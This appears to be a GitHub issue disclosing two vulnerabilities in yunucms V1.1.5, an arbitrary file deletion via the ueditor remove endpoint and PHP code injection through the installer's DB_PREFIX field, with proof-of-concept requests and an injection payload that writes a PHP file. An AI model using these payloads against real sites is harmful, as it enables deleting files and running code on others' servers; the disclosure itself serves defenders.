You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
In the remove() function shown above, the content of $_POST['key'] gets used in the call to unlink() without undergoing any authentication or sanitization.
2、Launch a new installation process to execute PHP code
After remove /data/install.lock ,remote attackers can Launch a new installation process.
The code section which made this vulnerability possible is found in the /statics/app/index/controller/Install.php file:
line 117-131
Use file_put_contents to wirte $arr into $file(config\database.php)
POC
In installation process setup2 ,we can input yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>' to 数据表前缀 DB_PREFIX
When finish installation process,we can get /data/database.php like this:
Two issue was discovered in yunucms V1.1.5。
1、Arbitrary File Deletion
2、Launch a new installation process to execute PHP code
1、There is a Arbitrary File Deletion attacks vulnerability which allows remote attackers to unlink any file
The code section which made this vulnerability possible is found in the /statics/ueditor/php/vendor/Local.class.php file:
line 34-68
In the remove() function shown above, the content of $_POST['key'] gets used in the call to unlink() without undergoing any authentication or sanitization.
POC
url:/statics/ueditor/php/controller.php?action=remove
POST: key=/uploads/../data/install.lock
/data/install.lock has been removed.
2、Launch a new installation process to execute PHP code
After remove /data/install.lock ,remote attackers can Launch a new installation process.
The code section which made this vulnerability possible is found in the /statics/app/index/controller/Install.php file:
line 117-131
Follow function setConfigfile(),in /app/admin/common.php file:
line 76-87
Use file_put_contents to wirte $arr into $file(config\database.php)
POC
In installation process setup2 ,we can input
yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>'
to 数据表前缀 DB_PREFIXWhen finish installation process,we can get /data/database.php like this:
Visit homepage http://127.0.0.1:81,will create file /uploads/image/f4ck.php
The text was updated successfully, but these errors were encountered: